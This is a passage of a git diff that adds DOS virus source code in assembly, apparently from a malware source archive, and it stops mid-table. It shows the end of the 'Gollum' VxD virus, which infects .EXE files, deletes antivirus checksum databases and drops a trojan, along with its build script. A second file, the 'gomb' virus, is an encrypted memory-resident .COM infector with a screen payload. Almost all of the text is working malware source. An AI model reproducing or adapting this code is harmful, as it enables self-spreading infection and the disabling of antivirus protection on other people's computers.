+VxD_Size equ 6592 ;VxD file size + ALIGN DWORD +DOS_Virus_Code equ this byte ;Start of Dos virus code + include gollum.inc ;Load Dos virus code +Header_Copy db Header_Size dup (00h) ;Buffer for old .EXE header +DOS_Virus_End equ this byte +DOS_Virus_Size equ (DOS_Virus_End-DOS_Virus_Code) +Our_Own_Call_Flag db "EERF" ;Dos call from virus? +File_Size dd 00000000h ;Size of file to infect +Start_FileName dd 00000000h ;Filename start +VxD_Buffer db 0200h dup (00h) ;VxD file copy +Infect_FileName db 80h dup (00h) ;Last executed file +File_Header db Header_Size dup (00h) ;Infected .EXE header +VxD_File_Name db 80h dup (00h) ;Path of virus VxD +Gollum_Name db "GOLLUM.386",00h ;Name of virus VxD file +Trojan_File_Name db "GOLLUM.EXE",00h ;Generated trojans +CheckSum_File_00: db "ANTI-VIR.DAT",00h ;Names of av databases +CheckSum_File_01: db "CHKLIST.TAV",00h +CheckSum_File_02: db "CHKLIST.MS",00h +CheckSum_File_03: db "AVP.CRC",00h +CheckSum_File_04: db "IVB.NTZ",00h +Gollum_Handle dw 0000h ;VxD file handle +Victim_Handle dw 0000h ;Victim file handle +File_Attr dw 0000h ;Victim file attr +File_Time dw 0000h ;Victim file time +File_Date dw 0000h ;Victim file date + +VxD_LOCKED_DATA_ENDS + +;Ŀ +;Initialization code segment +; + +VxD_ICODE_SEG + +;This is the virus startup code (Sys_Critical_Init) +; + +BeginProc WGoLLuM_Sys_Critical_Init + + ;Get path of WIN386.EXE + VMMCall Get_Exec_Path + ;Copy path to our buffer + mov esi,edx + mov edi,OFFSET32 VxD_File_Name + cld + rep movsb + mov esi,OFFSET32 Gollum_Name + mov ecx,0Bh + cld + rep movsb + ;Return, Sys_Critical_Init complete + clc + ret + +EndProc WGoLLuM_Sys_Critical_Init + +;This is the virus startup code (Device_Init) +; + +BeginProc WGoLLuM_Device_Init + + ;Hook int 21h so we can monitor dos file operations + mov eax,21h + mov esi,OFFSET32 VxD_Int_21h + VMMcall Hook_V86_Int_Chain + clc + ret + +EndProc WGoLLuM_Device_Init + +;This is the virus startup code (Init_Complete) +; + +BeginProc WGoLLuM_Init_Complete + + ;Check current date + mov ah,04h + VxDint 1Ah + cmp dx,0604h + jne short Not_Yet + ;Display instalation msg + VMMCall Get_SYS_VM_Handle + xor eax,eax + mov ecx,OFFSET32 VxD_Installation_Msg + mov edi,OFFSET32 VxD_Installation_Title + VxDcall Shell_SYSMODAL_Message +Not_Yet: + ;Return, Sys_Critical_Init complete + clc + ret + +EndProc WGoLLuM_Init_Complete + +VxD_ICODE_ENDS + +;Ŀ +;Locked code segment +; + +VxD_LOCKED_CODE_SEG + +;This is a call-back routine to handle the messages that are sent +;to VxD's to control system operation +; + +BeginProc WGoLLuM_Control + + Control_Dispatch Sys_Critical_Init, WGoLLuM_Sys_Critical_Init + Control_Dispatch Device_Init, WGoLLuM_Device_Init + Control_Dispatch Init_Complete, WGoLLuM_Init_Complete + clc + ret + +EndProc WGoLLuM_Control + +;This is the virus int 21h handler +; + +BeginProc VxD_Int_21h, High_Freq + + ;Save regs + pushad + ;Check for our own calls (avoid recursive int 21h calls) + cmp dword ptr [Our_Own_Call_Flag],"BUSY" + je short Exit_VxD_Int_21h + ;Set flag + mov dword ptr [Our_Own_Call_Flag],"BUSY" + ;Get called function + mov ax,word ptr [ebp.Client_AX] + ;Check for Exec function calls + cmp ax,4B00h + je short Store_FileName + ;Check for Terminate with error-code 00h function calls + cmp ax,4C00h + je short Infect_Stored_FileName + cmp ah,3Bh + je Drop_Exe_Trojan +Exit_VxD_Int_21h: + ;Clear flag + mov dword ptr [Our_Own_Call_Flag],"FREE" + ;Restore regs + popad + ;Int not served yet + stc + ret + +;Save file name for later infection +; + +Store_FileName: + ;Save filename into our buffer + movzx edx,word ptr [ebp.Client_DX] + movzx eax,word ptr [ebp.Client_DS] + shl eax,04h + add eax,edx + mov esi,eax + mov edi,OFFSET32 Infect_FileName +Go_Thru_Filename: + cld + lodsb + stosb + or al,al + jnz Go_Thru_Filename + jmp Exit_VxD_Int_21h + +;Infect stored file name +; + +Infect_Stored_FileName: + ;Check if working on C: drive + mov esi,OFFSET32 Infect_FileName + cmp word ptr [esi],":C" + jne Infect_Error +Look_End: + ;Find null marker into filename + cld + lodsb + or al,al + jnz Look_End +Found_Tail: + ;Search begin of file name + dec esi + mov ecx,0080h +Look_Start: + std + lodsb + ;Do not infect files with V character in their names + cmp al,"V" + je Infect_Error + ;Do not infect files with digit in their names + cmp al,"0" + jb short Check_Start + cmp al,"9" + jbe Infect_Error +Check_Start: + cmp al,"\" + je short Check_Names + loop Look_Start + ;Begin of file name not found, tchhh... + jmp Infect_Error +Check_Names: + inc esi + inc esi + ;Save pointer to file name start + mov dword ptr [Start_FileName],esi + cld + lodsd + ;Check for SCAN + cmp eax,"NACS" + je Infect_Error + ;Check for F-PROT + cmp eax,"RP-F" + je Infect_Error + ;Avoid THUNDERBYTE shit + cmp ax,"BT" + je Infect_Error + ;Get file attr + mov ax,4300h + mov edx,OFFSET32 Infect_FileName + VxDint 21h + jc Infect_Error + ;Save file attr + mov word ptr [file_attr],cx + ;Wipe out attr + mov ax,4301h + xor cx,cx + VxDint 21h + jc Infect_Error + ;Open file to infect + mov ax,3D02h + mov edx,OFFSET32 Infect_FileName + VxDint 21h + jc Restore_Attr + ;Get file handler + mov word ptr [Victim_Handle],ax + xchg bx,ax + ;Get file date/time + mov ax,5700h + VxDint 21h + jc Infect_Close + ;Save file date time + mov word ptr [File_Time],cx + mov word ptr [File_Date],dx + ;Read file header + mov ah,3Fh + mov ecx,Header_Size + mov edx,OFFSET32 File_Header + VxDint 21h + jc Restore_Date_Time + ;Seek to EOF and get real file size + call Seek_File_End + jc Restore_Date_Time + ;Do not infect too small files + cmp eax,DOS_Virus_Size+VxD_Size + jbe Restore_Date_Time +Test_EXE_File: + ;Point esi to file header + mov esi,OFFSET32 File_Header + ;Check dos .EXE file type mark + cmp word ptr [esi],"ZM" + jne Restore_Date_Time + ;Check if file is infected + cmp word ptr [esi+12h],"CR" + je Restore_Date_Time + ;Don't infect Windows files or above + cmp word ptr [esi+19h],0040h + jae Restore_Date_Time + ;Don't infect overlays + cmp word ptr [esi+1Ah],0000h + jne Restore_Date_Time + ;Check maxmem field + cmp word ptr [esi+0Ch],0FFFFh + jne Restore_Date_Time + ;Save entry point + push eax + mov eax,dword ptr [esi+14h] + ;Crypt it! + not eax + mov dword ptr [DOS_Virus_Code+0177h],eax + pop eax + ;Make a copy of .exe file header + push esi + mov edi,OFFSET32 Header_Copy + mov ecx,Header_Size +Copy_Loop: + cld + lodsb + not al + stosb + loop Copy_Loop + pop esi + ;Get file size into dx:ax + mov eax,dword ptr [File_Size] + mov edx,eax + shr edx,10h + ;Get file size div 10h + mov cx,0010h + div cx + ;Sub header size + sub ax,word ptr [esi+08h] + ;New entry point at EOF + mov word ptr [esi+14h],dx + mov word ptr [esi+16h],ax + ;Save delta offset + mov word ptr [DOS_Virus_Code+0001h],dx + ;Set new offset of stack segment in load module + inc ax + mov word ptr [esi+0Eh],ax + ;Set new stack pointer beyond end of virus + add dx,DOS_Virus_Size+VxD_Size+0200h + ;Aligment + and dx,0FFFEh + mov word ptr [esi+10h],dx + ;Get file size into dx:ax + mov eax,dword ptr [File_Size] + mov edx,eax + shr edx,10h + ;Get file size div 0200h + mov cx,0200h + div cx + or dx,dx + jz short Size_Round_1 + inc ax +Size_Round_1: + ;Check if file size is as header says + cmp ax,word ptr [esi+04h] + jne Restore_Date_Time + cmp dx,word ptr [esi+02h] + jne Restore_Date_Time + ;Get file size into dx:ax + mov eax,dword ptr [File_Size] + mov edx,eax + shr edx,10h + ;Add virus size to file size + add ax,DOS_Virus_Size+VxD_Size + adc dx,0000h + ;Get infected file size div 0200h + mov cx,0200h + div cx + or dx,dx + jz short Size_Round_2 + inc ax +Size_Round_2: + ;Store new size + mov word ptr [esi+02h],dx + mov word ptr [esi+04h],ax + ;Write DOS virus area next to EOF + mov ah,40h + mov ecx,DOS_Virus_Size + mov edx,OFFSET32 DOS_Virus_Code + VxDint 21h + jc Restore_Date_Time + ;Open Gollum VxD file + mov ax,3D00h + mov edx,OFFSET32 VxD_File_Name + VxDint 21h + jc Restore_Date_Time + ;Save file handler + mov word ptr [Gollum_Handle],ax +Read_VxD_Block: + ;Read VxD file block + mov ah,3Fh + mov bx,word ptr [Gollum_Handle] + mov ecx,0200h + mov edx,OFFSET32 VxD_Buffer + VxDint 21h + push eax + ;Encrypt block + mov esi,edx + mov edi,edx + mov cx,0200h +Crypt_Loop_3: + cld + lodsb + not al + stosb + loop Crypt_Loop_3 + ;Write block + pop ecx + mov ah,40h + mov bx,word ptr [Victim_Handle] + VxDint 21h + cmp cx,0200h + je Read_VxD_Block + ;Close file + mov bx,word ptr [Gollum_Handle] + mov ah,3Eh + VxDint 21h + ;Seek to beginning of file + mov bx,word ptr [Victim_Handle] + call Seek_File_Start + ;Mark file as infected + mov esi,OFFSET32 File_Header + mov word ptr [esi+12h],"CR" + ;Write new header + mov ah,40h + mov cx,Header_Size + mov edx,esi + VxDint 21h + ;Delete ANTI-VIR.DAT + mov esi,OFFSET32 CheckSum_File_00 + call Delete_File + ;Delete CHKLIST.TAV + mov esi,OFFSET32 CheckSum_File_01 + call Delete_File + ;Delete CHKLIST.MS + mov esi,OFFSET32 CheckSum_File_02 + call Delete_File + ;Delete AVP.CRC + mov esi,OFFSET32 CheckSum_File_03 + call Delete_File + ;Delete IVB.NTZ + mov esi,OFFSET32 CheckSum_File_04 + call Delete_File +Restore_Date_Time: + mov ax,5701h + mov cx,word ptr [File_Time] + mov dx,word ptr [File_Date] + VxDint 21h +Infect_Close: + ;Close file + mov ah,3Eh + VxDint 21h +Restore_Attr: + ;Restore file attr + mov ax,4301h + mov cx,word ptr [File_Attr] + mov edx,OFFSET32 Infect_FileName + VxDint 21h +Infect_Error: + jmp Exit_VxD_Int_21h + +;Drop a trojan .EXE file (sometimes) +; +Drop_Exe_Trojan: + ;This is our dice + in ax,40h + cmp al,0FFh + jne Bad_OverWrite + ;Open Gollum VxD file + mov ax,3D00h + mov edx,OFFSET32 VxD_File_Name + VxDint 21h + jc Bad_OverWrite + ;Save file handler + mov word ptr [Gollum_Handle],ax + ;Create file, abort if exist + mov ah,5Bh + xor cx,cx + mov edx,OFFSET32 Trojan_File_Name + VxDint 21h + jc short Bad_OverOpen + ;Save file handler + mov word ptr [Victim_Handle],ax +Trojanize_Block: + ;Read VxD file block + mov ah,3Fh + mov bx,word ptr [Gollum_Handle] + mov ecx,0200h + mov edx,OFFSET32 VxD_Buffer + VxDint 21h + ;Write block + xchg ecx,eax + mov ah,40h + mov bx,word ptr [Victim_Handle] + VxDint 21h + cmp cx,0200h + je Trojanize_Block + ;Close trojan file + mov ah,3Eh + VxDint 21h +Bad_OverOpen: + ;Close virus VxD file + mov bx,word ptr [Gollum_Handle] + mov ah,3Eh + VxDint 21h +Bad_OverWrite: + jmp Exit_VxD_Int_21h + +;Delete file routines +; + +Delete_File: + mov edi,dword ptr [Start_FileName] +Copy_DB_Name: + cld + lodsb + stosb + or al,al + jnz Copy_DB_Name + ;Wipe out file attr + mov ax,4301h + xor ecx,ecx + mov edx,OFFSET32 Infect_FileName + VxDint 21h + ;Delete filename + mov ah,41h + VxDint 21h + ret + +;Move file pointer routines (bx = file handle) +; + +Seek_File_Start: + xor al,al + jmp SHORT Seek_Int_21h +Seek_File_End: + mov al,02h +Seek_Int_21h: + mov ah,42h + xor cx,cx + xor dx,dx + VxDint 21h + jc short Seek_Error + ;Return file pointer position into eax + and eax,0000FFFFh + shl edx,10h + add eax,edx + mov dword ptr [File_Size],eax + clc + ret +Seek_Error: + stc + ret + +EndProc VxD_Int_21h + +VxD_LOCKED_CODE_ENDS + + END + +; - -[ASSEMBLE.BAT - Batch file used to build GOLLUM.INC] - - - - - - - ->8 + +tasm gollum +tlink /Tde gollum +exe2bin gollum.exe gollum.bin +crypt +data gollum.crp gollum.inc diff --git a/MSDOS/Virus.MSDOS.Unknown.gomb.asm b/MSDOS/Virus.MSDOS.Unknown.gomb.asm new file mode 100644 index 00000000..3e7f0933 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gomb.asm @@ -0,0 +1,900 @@ +CODE segment para public 'code' + assume cs:code,ds:code,es:nothing,ss:nothing + + org 100h + +egy equ 1 ; one +dma equ 0b0h +atvar equ 300 ; at paramaeter +xtvar equ 1 ; xt parameter +suruseg equ 255 ; density +idotartalek equ 18*30 ; time delay + +start: db 0e9h,0,0 +;##################### Initialization ###################### +resid: push ax + mov cx,offset memory - offset begin ;#### decoding #### + mov bx,ds:[101h] + add bx,103h+(offset begin-offset resid) +jhg1: xor byte ptr [bx],0 + inc bx + loop jhg1 + +begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin) + mov cs:[0feh],bx + mov ax,[bx+(offset eltarol-offset resid)] + mov cl,[bx+(offset eltarol-offset resid)+2] + mov ds:[100h],ax + mov ds:[102h],cl + mov cx,0b800h + mov ah,15 + push bx + int 10h + pop bx + cmp al,7 + jne rety + mov ch,0b0h +rety: mov [bx+(offset ruut - offset resid)+1],cx + mov word ptr [bx+(offset counter-offset resid)],idotartalek + mov byte ptr [bx+(offset jammed-offset resid)+1],al + mov byte ptr [bx+(offset vanesik-offset resid)],0 + xor ax,ax + mov ds,ax + cmp word ptr ds:[130h],4142h + je zipp + mov ds:[130h],4142h + mov ax,cs + dec ax + mov ds,ax + mov ax,ds:[3] + sub ax,180h + mov ds:[3],ax + add ax,ds:[1] + mov es,ax + push cs + pop ds + sub word ptr ds:[2],384 + mov di,3 + mov si,bx + mov cx,(offset memory-offset resid) shr 1 +1 + cld + rep movsw + mov ax,es + sub ax,10h + mov ds,ax + mov dx,offset irq + mov ax,251ch + int 21h + mov ah,2ah + int 21h + cmp al,1 + jne zipp + dec al + out 0a0h,al + mov al,dma + out 41h,al +zipp: + mov ax,cs + mov ds,ax + mov es,ax + pop ax + push cs + mov cx,100h + push cx + mov cx,ds:[0feh] + sub cx,100h + retf +eltarol dw 20cdh +eltarol2 db 90h + +;######################### Vyrus activated ########################## +csik: mov ax,0e000h + mov ds,ax +csiky: mov ds:[0],al + inc al + jmp csiky + +;######################### propagation part ########################## + +eredeti: db 0eah ; original +int211 dw 0 +int212 dw 0 +counter dw 0 +szaporodas: cmp ah,4bh + jne eredeti + or al,al + jnz eredeti + push ax + push es + push bx + push ds + push dx + mov bx,dx +koj: inc bx + cmp byte ptr [bx],'.' + jne koj + cmp byte ptr[bx+1],'C' + jne kiugras1 + mov cs:kds,ds + mov cs:kdx,dx + mov cs:kbx,bx + call probe +kiugras1: pop dx + pop ds + pop bx + pop es + pop ax + jmp eredeti +kds dw 0 +kdx dw 0 +kbx dw 0 +kkk dw 0 +fszam dw 0 +probe: push cs + pop es + mov di,offset memory + mov si,dx + mov cx,40 + cld + rep movsw + mov bx,0ff0h + mov ah,48h + int 21h + jnc juk1 + ret + ;!!!!! memoria lefoglalva (kkk = Seg) +atr dw 0 +juk1: mov cs:kkk,ax + mov dx,offset memory + push ds + pop es + mov bx,cs:kbx + mov byte ptr [bx+1],'A' ; + call elorutin + push cs + pop ds ;DS:DX a masolt nev. + mov ax,4300h + int 21h + mov atr,cx + xor cx,cx + mov ax,4301h + int 21h + ;!!!!! Attr allitas + cmp cs:attrflag,0 + jz juk2 + mov ds,cs:kds + jmp memoff +juk2: mov di,kdx ;ES:DI a regi nev atirva + mov ah,56h + int 21h + call utorutin ;!!!!! Atnevezve + mov dx,cs:kdx + push es + pop ds + mov ax,3d02h + int 21h ;!!!!! File megnyitva + mov cs:fszam,ax + mov ds,cs:kkk + xor dx,dx + mov bx,ax + mov cx,0fc00h-(offset memory-offset resid) + mov ah,3fh + int 21h + cmp ax,0fc00h-(offset memory-offset resid) + ;!!!!! Beolvasva a program (csak a hossza miatt) + je hosszu ;zarjuk le a file-t + cmp ax,7580 + jb hosszu ;tul rovid a file + mov di,ax + + mov bx,ds:[1] + cmp word ptr [bx+3],0b950h + +;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$ + + je hosszu + push di + mov cx,(offset memory-offset resid) + mov si,offset resid + push ds + pop es + push cs + pop ds + inc byte ptr ds:[offset jhg1 +2] + mov ax,es:[0] + mov eltarol,ax + mov al,es:[2] + mov eltarol2,al + rep movsw ;!!!!! Atmasolva (hehe) + mov al,byte ptr ds:[offset jhg1 +2] + pop di + add di,(offset begin-offset resid) + mov cx,offset memory - offset begin ;#### coding #### +jhga: xor byte ptr es:[di],al + inc di + loop jhga + sub di,(offset memory - offset resid) + push di ;Az ugrasi hely + mov bx,fszam + mov cx,offset memory - offset begin + mov dx,di + push es + pop ds + mov ah,40h + int 21h + pop di + cmp ax,offset memory - offset begin + je ghj1 +hosszu: jmp zardle +ghj1: ;!!!!! Kiirva a vege + mov byte ptr ds:[0],0e9h + sub di,3 + mov ds:[1],di + mov bx,cs:fszam + xor cx,cx + xor dx,dx + mov ax,4200h + push bx + int 21h + pop bx + mov cx,3 + xor dx,dx + mov ah,40h + int 21h +zardle: mov bx,cs:fszam + mov ah,3eh + int 21h ;!!!!! File lezarva + push cs + pop es + mov di,offset memory + mov ds,cs:kds + mov dx,cs:kdx + mov ah,56h + int 21h ;!!!!! File visszanevezve + mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + mov ax,4301h + mov cx,cs:atr + int 21h ;!!!!! attr visszaall +memoff: mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + push cs + pop ds + mov es,cs:kkk + mov ah,49h + int 21h ;!!!!! Memoria visszaalt + ret +it241 dw 0 +it242 dw 0 +attrflag db 0 + +elorutin: mov cs:attrflag,0 + xor ax,ax + mov ds,ax + mov ax,ds:[90h] + mov cs:it241,ax + mov ax,ds:[92h] + mov cs:it242,ax + mov ds:[90h],offset it24 + mov ds:[92h],cs + ret + +utorutin: xor ax,ax + mov ds,ax + mov ax,cs:it241 + mov ds:[90h],ax + mov ax,cs:it242 + mov ds:[92h],ax + ret +it24: mov cs:attrflag,1 + xor al,al + iret +vanesik db 0 +irq: cli + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + cmp cs:counter,0 + je sabad + dec cs:counter + jne sabad + xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov cs:int211,ax + mov ax,ds:[86h] + mov cs:int212,ax + mov ds:[84h],offset szaporodas + mov ds:[86h],cs +sabad: cmp cs:vanesik,0 + je keress + call idovan + jmp jumper +keress: call ruut +jumper: pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + iret + +idovan: xor ah,ah + int 1ah + and dx,suruseg + jne rutyi + call action +rutyi: ret + + +ruut: mov ax,0b800h + mov es,ax + mov di,cs:did + mov cx,512 + cld +poke: jcxz huy + mov al,'E' + repnz scasb + jz talalt +huy: cmp di,4095 + jb kisebb + mov cs:did,0 + ret +kisebb: add cs:did,512 + ret +did dw 0 +talalt: test di,1 + jz poke + mov dl,es:[di+1] + mov dh,es:[di+3] + or dx,2020h + cmp dx,6973h ;'is' + jne poke + mov bl,es:[di+5] + or bl,20h + cmp bl,'k' + jne poke + mov cs:vanesik,1 + jmp huy +action: mov ax,cs + mov ds,ax + mov es,ax + mov vanesik,0 + mov pontszam,1 + mov si,offset zizi + mov di,offset novi + cld + mov cx,6 + rep movsw + call zoldseg +jammed: mov ax,3 + int 10h + cmp counterr,atvar + jne fdr + push cs + pop es + lea bx,mess + mov ax,1301h + mov bx,1 + xor dx,dx + mov cx,offset drt-offset mess + int 10h +fdr: ret + +counterr dw 0 +zoldseg: cli + mov di,offset memory + xor ax,ax + cld + mov cx,200*3 + rep stosw + mov ah,0c0h + mov si,3333h + int 15h + cmp si,3333h + mov ax,xtvar + je xt + mov ax,atvar +xt: mov counterr,ax + mov ax,3502h + int 21h + cmp bx,0e9eh + jne ibm + call init1 + mov pontm,100 + mov port,22h + jmp entry +ibm: ;Ibm bulik + mov pontm,200 + mov al,70h + mov port,60h ;% + mov ah,15 + int 10h + cmp al,7 + jne cga + call init3 + jmp entry +cga: call init2 + jmp entry +port dw 22h +pontm dw 100 + +init1: mov ax,200h + mov es,ax + xor di,di + mov cx,4000h + cld + xor ax,ax + rep stosw + mov plotdw,offset plot + mov unplotdw,offset unplot + ret +init2: mov ax,0b800h + mov es,ax + mov ax,6 + int 10h + mov plotdw,offset plotcga + mov unplotdw,offset unplotcga + ret +init3: mov ax,0b000h + mov es,ax + call prog + mov plotdw,offset plotherc + mov unplotdw,offset unplotcga + ret +prog: mov dx,3bfh + mov al,3 + out dx,al + mov al,28h + mov dx,3b8h + out dx,al + mov ah,0 + mov cx,12 + lea bx,ports +lopi1: mov dx,03b4h + mov al,ah + out dx,al + inc ah + mov dx,03b5h + mov al,[bx] + out dx,al + inc bx + loop lopi1 + + mov dx,3bfh + mov al,3 + out dx,al + mov dx,3b8h + mov al,0ah + out dx,al + xor di,di + mov cx,4000h + xor ax,ax + cld + rep stosw + ret + +ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0 + +;**************************** Forgatorutin ************************************ + + even +sina dw 0 +cosa dw 0 ;si-t meghagyja +sinb dw 0 +cosb dw 0 +pontszam dw 1 +transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB +; add bx,ytol ;ez itt jolesz + shl di,1 + shl bx,1 ;X es Y elokeszitese a szorzashoz + mov ax,di + imul cosa + mov bp,dx + mov ax,bx + imul sina + add bp,dx ; bp=X' = cosa*X + sina*Y + mov ax,bx + imul cosa + mov bx,dx + mov ax,di + imul sina + sub bx,dx ; bx=Y' = cosa*X - sina*Y + shl bp,1 + shl cx,1 ;X' es Z elokeszitese + mov ax,bp + imul cosb + mov di,dx + mov ax,cx + imul sinb + sub di,dx ; di=X'' = cosb*X' - sinb*Z + mov cx,di + mov ax,bx + ret + +comment @ + mov ax,cx + imul cosb + mov cx,dx + mov ax,bp + imul sinb + add cx,dx ; cx=Z'' = cosb*Z = sinb*X' + + ; out: di=X'' bx=Y'' cx=Z'' + mov dx,keptav +;****************************** PERSPEKTIVA ********************************** + mov ax,di + shl ax,1 + imul tavol + mov cx,dx + mov ax,bx + shl ax,1 + imul tavol + mov ax,dx + ret ; ki : CX=X' AX=Y' + +@ + +plotherc: ; al=y cx=x + xor ah,ah + mov dx,ax + shr dx,1 + add ax,dx + mov dx,cx + mov cl,al + and cl,3 + shr ax,1 + shr al,1 + mov di,2000h + shl di,cl + mov cl,90 + mul cl + add di,ax + mov ax,dx + mov cx,dx + jmp ezisi +plotcga: xor di,di + shr ax,1 + jnc tryp + mov di,2000h +tryp: mov dl,80 + mul dl + add di,ax + mov ax,cx +ezisi: shr ax,1 + shr ax,1 + shr ax,1 + add di,ax + and cl,7 + mov al,128 + shr al,cl + or es:[di],al + jmp ezis1 + +unplotcga: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di],al + ret + +plot: ;AL = y koord. cx = x koord. + mov dl,160 + mul dl + mov di,ax + mov ax,cx + shr ax,1 + shr ax,1 + add di,ax + and di,-2 + and cl,7 + mov al,128 + shr al,cl + or es:[di+egy],al +ezis1: mov [bx],al + inc bx + mov [bx],di + add bx,2 + ret +unplot: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di+egy],al + ret +kezdfazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam +ck1: push cx + lodsw + mov cx,ax + shl cx,1 + add cx,320 + lodsw + add si,2 + add ax,50 + call word ptr [plotdw] + pop cx + loop ck1 + ret +indy db 0 + +fazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam + mov indy,1 +ck12: push cx + call word ptr [unplotdw] + push bx + lodsw + mov di,ax + lodsw + mov bx,ax + lodsw + mov cx,ax + call transzform + pop bx + add ax,50 + mov di,bxpo + add al,[di] + shl cx,1 + add cx,bxpo2 + cmp indy,0 + je ruty + mov indy,0 + cmp karal2,0 + jne ruty + push cx + push ax + inc cx + call word ptr [plotdw] + pop ax + pop cx + sub bx,3 +ruty: call word ptr [plotdw] + pop cx + loop ck12 + ret + +novpont: mov ax,pontm + cmp pontszam,ax + je trew + mov cx,pontm + sub cx,pontszam + mov ch,cl + shR cx,1 + shr cx,1 +yut: loop yut + inc pontszam + ret +trew: call movie + mov bx,bxpo + cmp bx,offset patt + je valto + cmp bx,offset patt+29 + je valto +iuy: add bx,novi + mov bxpo,bx + ret +valto: neg novi + jmp iuy +novi dw -1 +bxpo dw offset patt +bxpo2 dw 320 +novi2 dw 4 +karal dw 300 +karal2 dw 600 +zizi dw -1,offset patt,320,4,300,600 +movie: cmp karal,0 + je jesty + dec karal + ret +jesty: cmp karal2,0 + je jesty2 + dec karal2 +jesty2: mov bx,bxpo2 + cmp bx,100 + je valto2 + cmp bx,540 + je valto2 +iuy2: add bx,novi2 + mov bxpo2,bx + ret +valto2: neg novi2 + jmp iuy2 +elokesz: call novpont + mov bl,szogx + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sina,ax + mov ax,costabl[bx] + mov cosa,ax + mov bl,szogy + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sinb,ax + mov ax,costabl[bx] + mov cosb,ax + mov al,szogxvalt + add szogx,al + mov al,szogyvalt + add szogy,al + ret + even +szogx db 0 +szogy db 0 +szogxvalt db 2 +szogyvalt db 5 +tavol dw 32767 + +phase: call elokesz + call fazisrajz + ret +entry: call kezdfazisrajz +rajta1: call phase + cmp pontm,100 + je apc + cmp byte ptr ds:[offset ruut +2],0b8h + je ccggaa + mov cx,counterr + mov dx,3bah +qaz1: in al,dx + and al,1 + jnz qaz1 +qaz2: in al,dx + and al,1 + jz qaz2 + loop qaz1 + jmp apc +ccggaa: mov dx,3dah +qaz3: in al,dx + and al,8 + jnz qaz3 +qaz4: in al,dx + and al,8 + jz qaz4 +apc: mov dx,port + in al,dx + and al,1 + jz rajta1 + ret + even +plotdw dw 0 +unplotdw dw 0 + +sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393 + dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279 + dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519 + dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811 + dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898 + dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580 + dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728 + dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273 + dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790 + dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005 + dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151 + dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512 + dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410 + dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808 + dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204 + dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731 + dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105 + dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113 + dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609 + dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521 + dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852 + dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170 + dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530 + dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039 + dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011 + dw -3212, -2410, -1608, -804 +costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571 + dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683 + dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731 + dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868 + dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279 + dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179 + dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804 + dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602 + dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530 + dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594 + dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790 + dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956 + dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971 + dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757 + dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285 + dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571 + dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731 + dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868 + dw 